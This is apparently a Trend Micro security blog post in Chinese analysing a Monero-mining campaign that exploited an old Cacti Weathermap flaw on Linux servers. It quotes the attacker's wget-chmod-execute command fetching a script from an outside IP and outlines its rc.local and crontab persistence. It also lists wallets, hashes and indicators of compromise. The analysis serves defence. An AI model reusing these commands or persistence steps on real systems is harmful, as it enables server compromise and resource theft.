虛擬貨幣挖礦程式利用PHP Weathermap漏洞入侵 Linux伺服器 ,台灣為攻擊目標之一

進行合法的大規模虛擬貨幣採礦往往要投資專用硬體及大量電力才能獲利。但這並沒有讓網路犯罪分子放棄:去年的惡意虛擬貨幣挖礦活動相當猖獗,是連接家用路由器的設備被偵測最多的網路事件

通過我們對事件回應相關的監測,發現了可以關聯到之前使用JenkinsMiner惡意軟體來進行虛擬貨幣挖礦活動的入侵行為。不同的是:這波攻擊針對的是Linux伺服器。同時它也是重複使用漏洞的經典例子,因為它所攻擊的是相當舊的漏洞,修補程式已經推出近五年了。

根據趨勢科技Smart Protection Network的資料顯示出這是波相當積極的攻擊,主要針對的是日本、台灣、中國、美國和印度。

Cryptocurrency Miner Distributed via PHP Weathermap Vulnerability, Targets Linux Servers

圖1、從虛擬貨幣挖礦活動所看到的網路入侵次數

(2017年12月到2018年3月中)

Cryptocurrency Miner Distributed via PHP Weathermap Vulnerability, Targets Linux Servers

圖2、惡意虛擬貨幣挖礦活動的國家分佈 台灣列全球第二

攻擊鏈分析

在這波攻擊中,駭客利用的是漏洞CVE-2013-2618,這是Cacti Network Weathermap外掛程式的一個舊漏洞,這外掛程式可以讓系統管理員視覺化網路活動。為什麼駭客選擇攻擊舊漏洞:Network Weathermap目前只有兩個公開漏洞,都是在2014年6月被公布。原因可能不僅是因為此漏洞已經有現成的攻擊碼,而且也因為使用開放原始碼工具的組織在更新修補方面的延遲

Cryptocurrency Miner Distributed via PHP Weathermap Vulnerability, Targets Linux Servers

圖3、顯示Weathermap漏洞如何被攻擊的威脅指標

 

在上面我們可以看到:

  1. 被模糊化的部分是目標網站伺服器/端口。
  2. 檔案/plugins/weathermap/configs/conn.php/plugins/weathermap/php遭受跨站腳本(XSS)攻擊產生的檔案。
  3. 理想的目標是Linux伺服器(儘管Cacti和外掛程式也可以安裝在Windows上)。

 

除了原先的conn.php,我們也看到類似的HTTP請求送到名為’cools.php‘的頁面:

Cryptocurrency Miner Distributed via PHP Weathermap Vulnerability, Targets Linux Servers

圖4、對cools.php的類似HTTP請求

 

可以從上面看到會執行這些命令:

  • wget watchd0g.sh hxxp://222[.]184[.]]79[.]11:5317/watchd0g[.]sh

//用wget(大多數Linux系統上都有的工具程式)下載檔案

  • chmod 775 watchd0g.sh

//讓檔案可以執行

  • ./watchd0g.sh

//最後執行該檔案

 

watchd0g.sh檔案包含以下程式碼:

Cryptocurrency Miner Distributed via PHP Weathermap Vulnerability, Targets Linux Servers

圖5、watchd0g.sh程式碼截圖

 

程式碼會寫入/etc/rc.local,這代表每次重新啟動系統都會執行watchd0g.sh。修改/etc/crontabwatchd0g.sh每三分鐘執行一次。接著它會將Linux核心參數vm.nr_hugepages修改成挖掘門羅幣(XMR)的建議值。它同時會確保watchd0g.sh程序的執行,被終止時會重新下載再執行。

它的主要目的是從取得watchd0g.sh的同一台伺服器下載data.x86_64(趨勢科技偵測為COINMINER_MALXMR.SM-ELF64)。

 

分析Linux XMRig挖礦程式

最後下載的檔案(在01/28/2018為dada.x86_64,以前名稱為xignkrb)是改過的XMRig挖礦程式。XMRig是合法的開放原始碼XMR挖礦程式,有多個更新版本,可以支援32位元和64位元的Windows和Linux作業系統。XMRig透過命令列執行時會顯示以下內容:

Cryptocurrency Miner Distributed via PHP Weathermap Vulnerability, Targets Linux Servers

圖6、透過命令列執行dada.x86_64

 

XMRig應該和名為‘config.json’的設定檔一起執行,或用參數來指定所需細節,例如要使用的演算法(CryptoNight/CryptoNight-Lite)、最大CPU使用率、挖礦伺服器和登入憑證(門羅幣錢包和密碼)。這次攻擊用的樣本已經被修改過而不需要設定檔或參數。一切都已經寫入程式碼。大多數樣本也不會出現命令列顯示。

Cryptocurrency Miner Distributed via PHP Weathermap Vulnerability, Targets Linux Servers

圖7、挖礦程式所可以指定的參數

 

跟著門羅幣走

 

趨勢科技收集了五個可能樣本來取得兩個登入使用者名稱,符合挖礦程式所送至的門羅幣錢包。

根據這兩個錢包可以知道攻擊者挖了約320 XMR(到2018年3月21日約為74,677美元)。要注意的是這只是整波攻擊的一小部分獲利。早些時候的報告在同一波攻擊的一個門羅幣錢包發現價值300萬美元的XMR。

 

SHA256礦池(Mining Pool)錢包地址
690aea53dae908c9afa933d6
0f467a17ec5f72463988eb5af
5956c6cb301455b
pool[.]minexmr[.]
com:443
42zJYtQbSVrYVzoE97RC
n45T9SmfCTGYB9QWDw
6Zt2jwX7BzrfNXvoa4SSs1
n71S3g1NLyPHyx4nKY8K
KtovCqjLPViqYrL
48cf0f374bc3add6e3f73f6db
466f9b62556b49a9f7abbcce
068ea6fb79baa04
pool[.]supportxmr[.]
com:80
42zJYtQbSVrYVzoE97RC
n45T9SmfCTGYB9QWDw
6Zt2jwX7BzrfNXvoa4SSs1
n71S3g1NLyPHyx4nKY8K
KtovCqjLPViqYrL
1155fae112da3072d116f39e9
0f6af5430f44f78638db3f43a6
2a9037baa8333
xmr[.]krbpool[.]
com:443
45AarDcdcDXXdT7aRt2dp
oMwQdEj4WzLyS5YvD4z
DBYRLQFKxudkJMdR98R
myqmSdD4gR4hZusqwmf
k7gF439YmzCnFmKDj
2c7b1707564fb4b228558526
163249a059cf5e90a6e946be
152089f0b69e4025
pool[.]supportxmr[.]
com:80
42zJYtQbSVrYVzoE97RC
n45T9SmfCTGYB9QWDw
6Zt2jwX7BzrfNXvoa4SSs1
n71S3g1NLyPHyx4nKY8K
KtovCqjLPViqYrL
d814bf38f5cf7a58c3469d530
d83106c4fc7653b6be079fc2a
6f73a36b1b35c6
pool[.]supportxmr[.]
com:80
42zJYtQbSVrYVzoE97RC
n45T9SmfCTGYB9QWDw
6Zt2jwX7BzrfNXvoa4SSs1
n71S3g1NLyPHyx4nKY8K
KtovCqjLPViqYrL

圖8、包含門羅幣錢包的樣本

 

結論和緩解措施

 

這波攻擊需要以下條件來進行:

  • 使用Linux(x86-64)的網站伺服器,送入客製化的XMRig 64位元ELF版本挖礦程式
  • 這網站伺服器可以接受外部連線
  • Cacti(開放原始碼的網頁版網路監視製圖工具)必須具備外掛功能並且使用舊版的Network Weathemap(97a或之前版本)
  • 裝有Cacti的網站伺服器不需身份認證就可以存取網站資源
  • 為了要完美執行,網站伺服器要以’root’(或同等)權限執行(腳本內的某些命令需要root權限)

 

前兩項幾乎是必然的,但最後三項就讓人不禁搖頭:為什麼有人會公開分享網路資料(Cacti)?真的有人用’root’運行網站伺服器?

Cacti的資料應該要被妥善保存在內部。暴露這些資料代表運作安全遭遇巨大的風險。雖然這樣子可以讓系統或網路管理員方便地監控自己的環境(例如只要使用瀏覽器書籤),但對惡意份子來說也是一樣方便。還有其他辦法可以達到同樣的效果,不過要採取對策來強化和保護系統,免於被駭或濫用。當然,用最新修補程式更新系統(或讓舊系統/網路採用虛擬修補技術)也會讓攻擊者更難以下手。

主動式事件回應策略包括積極尋找和回應威脅,這可以提高對傳統安全解決方案所可能忽略攻擊的能見度。確認這些技術還能夠為組織提供可操作性的情報,從而協助建立更加強大的回應基準。

趨勢科技Deep Discovery利用特製引擎、客製化沙箱和跨越整個攻擊生命週期的無縫關聯技術來偵測、深入分析和主動回應漏洞攻擊或其他類似威脅,從而甚至無須更新引擎或特徵碼就可以偵測此類威脅。趨勢科技Deep Discovery Inspector透過下列DDI規則來防禦此類攻擊:

  • DDI Rule ID 2452: Wget Commandline Injection

趨勢科技Deep SecurityVulnerability Protection可以利用下列DPI規則來保護使用者對抗針對上述漏洞(或使用XSS攻擊)的威脅:

  • 1005934 – Identified Suspicious Command Injection Attack
  • 1006823 – Identified Suspicious Command Injection Attack – 1
  • 1000552 – Generic Cross Site Scripting(XSS) Prevention

 

趨勢科技的TippingPoint客戶可以利用下列MainlineDV過濾器來防護上述威脅:

  • 3886: HTTP: Cross Site Scripting in POST Request

 

入侵指標

趨勢科技還確認了攻擊IP地址。但因為機器性質顯示它們可以被遠端控制,所以就不需要列出它們。我們的研究還讓發現了可能被用在此波攻擊的Python工具,使用HTTP User-Agent ‘python-requests/2.18.4’。

 

相關雜湊值:

 

SHA256敘述
4a70da8ad6432d7aa639e6c5
e0c03958eebb3728ef89e74c
028807dd5d68e2b4
Bourne-Again shell script ASCII text executable
0adadc3799d06b35465107f9
8c07bd7eef5cb842b2cf09eba
eaa3773c1f02343
ELF 64-bit LSB executable x86-64 version 1 (GNU/Linux)
dynamically linked interpreter /lib64/ld-linux-x86-64.so.2 for
GNU/Linux 2.6.32
BuildID[sha1]=7b9059fbf5f223af2bf1d
83251d640e0f60bbe00 stripped
d814bf38f5cf7a58c3469d530
d83106c4fc7653b6be079fc2a
6f73a36b1b35c6
ELF 64-bit LSB executable x86-64 version 1 (GNU/Linux)
dynamically linked interpreter /lib64/ld-linux-x86-64.so.2 for
GNU/Linux 2.6.32
BuildID[sha1]=5722b052bfd047b57ec37
10dd948bfc9ee7d7316 stripped
7f30ea52b09d6d9298f4f30b8
045b77c2e422aeeb84541bb5
83118be2425d335
ELF 64-bit LSB executable x86-64 version 1 (GNU/Linux) dynamically linked interpreter
/lib64/ld-linux-x86-64.so.2 for GNU/Linux 2.6.32
BuildID[sha1]=9bc00ee0d5261d8bb29
b753b8436a1c54bd19c94 stripped
690aea53dae908c9afa933d6
0f467a17ec5f72463988eb5af
5956c6cb301455b
ELF 64-bit LSB executable x86-64 version 1 (SYSV)
dynamically linked interpreter /lib64/ld-linux-x86-
64.so.2 for GNU/Linux 2.6.18 stripped
1155fae112da3072d116f39e9
0f6af5430f44f78638db3f43a6
2a9037baa8333
ELF 64-bit LSB executable x86-64 version 1 (SYSV)
dynamically linked interpreter /lib64/ld-linux-x86-
64.so.2 for GNU/Linux 2.6.18 stripped
2c7b1707564fb4b228558526
163249a059cf5e90a6e946be
152089f0b69e4025
ELF 64-bit LSB executable x86-64 version 1 (SYSV)
dynamically linked interpreter /lib64/ld-linux-x86-
64.so.2 for GNU/Linux 2.6.18 stripped
48cf0f374bc3add6e3f73f6db4
66f9b62556b49a9f7abbcce06
8ea6fb79baa04
ELF 64-bit LSB executable x86-64 version 1 (SYSV)
dynamically linked interpreter /lib64/ld-linux-x86-
64.so.2 for GNU/Linux 2.6.18 stripped

 

與惡意/修改過XMRig挖礦程式相關的IP地址和網址:

  • 222[.]184[.]79[.]11
  • bbc[.]servehalflife[.]com
  • 190[.]60[.]206[.]11
  • 182[.]18[.]8[.]69
  • jbos[.]7766[.]org
  • 115[.]231[.]218[.]38

 

@原文出處:Cryptocurrency Miner Distributed via PHP Weathermap Vulnerability, Targets Linux Servers  作者:趨勢科技網路安全解決方案團隊